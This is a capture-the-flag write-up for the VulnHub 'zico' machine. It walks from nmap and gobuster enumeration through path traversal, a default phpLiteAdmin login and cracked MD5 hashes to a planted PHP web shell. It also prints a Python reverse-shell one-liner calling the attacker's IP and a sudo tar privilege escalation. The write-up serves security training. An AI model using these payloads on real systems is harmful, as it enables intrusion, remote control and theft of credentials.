CTF : zico

CTF zico writeup. Source VulnHub. Announced difficulty level: Intermediate

Posted by Boula-Bytes on 23 February 2022

CTF : zico

Informations

  • IP: 192.168.0.188
  • MYIP: 192.168.0.36

First enumeration

Basics

  • NMAP
console
$ sudo nmap -p- -A 192.168.0.188
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-23 18:12 CET
Nmap scan report for 192.168.0.188
Host is up (0.00012s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
|   2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_  256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Zico's Shop
|_http-server-header: Apache/2.2.22 (Ubuntu)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          34546/udp6  status
|   100024  1          35134/udp   status
|   100024  1          38163/tcp   status
|_  100024  1          56717/tcp6  status
38163/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:59:2C:9A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.12 ms 192.168.0.188

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.94 seconds
console
$ gobuster dir -r -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt -u http://192.168.0.188 -x cgi,html,txt,js,php,php.bak,bak,zip,sql,sql.bak,tgz,tar.gz,bkp,tar,rar,id_rsa,log,xml,json,sh,py,pl,rb,csv,pub 2>/dev/null
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.188
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              sql,tgz,bkp,rar,rb,pub,php,sql.bak,tar,txt,php.bak,zip,tar.gz,id_rsa,sh,py,pl,cgi,csv,js,bak,log,xml,json,html
[+] Add Slash:               true
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
2022/02/23 18:19:03 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 7970]
/cgi-bin/             (Status: 403) [Size: 289] 
/img/                 (Status: 200) [Size: 1106]
/icons/               (Status: 403) [Size: 287] 
/tools.html           (Status: 200) [Size: 8355]
/view.php             (Status: 200) [Size: 0]   
/view/                (Status: 200) [Size: 0]   
/doc/                 (Status: 403) [Size: 285] 
/css/                 (Status: 200) [Size: 1118]
/js/                  (Status: 200) [Size: 1118]
/vendor/              (Status: 200) [Size: 1731]
/package.json         (Status: 200) [Size: 789] 
/less/                (Status: 200) [Size: 1328]
/server-status/       (Status: 403) [Size: 295] 
/dbadmin/             (Status: 200) [Size: 916]

Vulnerabilities search

console
$ curl http://192.168.0.188/view.php?page=../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
ntp:x:103:108::/home/ntp:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
statd:x:105:65534::/var/lib/nfs:/bin/false
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
zico:x:1000:1000:,,,:/home/zico:/bin/bash

http://192.168.0.188/dbadmin/test_db.php

-> phpLiteAdmin v1.9.3

console
$ searchsploit phpliteadmin
------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                       |  Path
------------------------------------------------------------------------------------- ---------------------------------
phpLiteAdmin - 'table' SQL Injection                                                 | php/webapps/38228.txt
phpLiteAdmin 1.1 - Multiple Vulnerabilities                                          | php/webapps/37515.txt
PHPLiteAdmin 1.9.3 - Remote PHP Code Injection                                       | php/webapps/24044.txt
phpLiteAdmin 1.9.6 - Multiple Vulnerabilities                                        | php/webapps/39714.txt
------------------------------------------------------------------------------------- ---------------------------------

Here we can use default password which is 'admin'

Once we logged in, there an info table with two users :

root    653F4B285089453FE00E2AAFAC573414    1
zico    96781A607F4E9F5F423AC01F0DAB0EBD    2

Exploit

Let's try these hashes into crackstation.net :

653F4B285089453FE00E2AAFAC573414    md5 34kroot34
96781A607F4E9F5F423AC01F0DAB0EBD    md5 zico2215@

We could try those password with ssh but none of them works.

So we could use the exploit found in exploitdb for version 1.9.3 :

console
$ searchsploit -m php/webapps/24044.txt

So I create a new db named evil.php. Add a table joe with an integer field phil. In the field I insert a new row with this content :

php
<?php system($_GET["joe"]);?>

Now we need to move this file into a good dir. Go to rename database and set the new name with a new path :

/var/www/dbadmin/evil.php

On my kali I launch a pwncat : 

console
$ pwncat -l 1234

Now we just have to navigate to it : 

console
http://192.168.0.188/dbadmin/evil.php?joe=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.36",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

We got a shell :)

Privilege escalation

console
$ cat /home/zico/wordpress/wp-config.php
[...]
/** MySQL database username */
define('DB_USER', 'zico');

/** MySQL database password */
define('DB_PASSWORD', 'sWfCsfJSPV9H3AmQzw8');

[...]

We can login via ssh with thos creds :

zico:sWfCsfJSPV9H3AmQzw8

Enumeration for privesc

console
$ sudo -l
Matching Defaults entries for zico on this host:
    env_reset, exempt_group=admin, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User zico may run the following commands on this host:
    (root) NOPASSWD: /bin/tar
    (root) NOPASSWD: /usr/bin/zip

Exploit

Go to gtfobins to check. I choose to use tar :

console
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Then...

console
# cat /root/flag.txt
#
#
#
# ROOOOT!
# You did it! Congratz!
#
# Hope you enjoyed!
#
#
#
#

#

\o/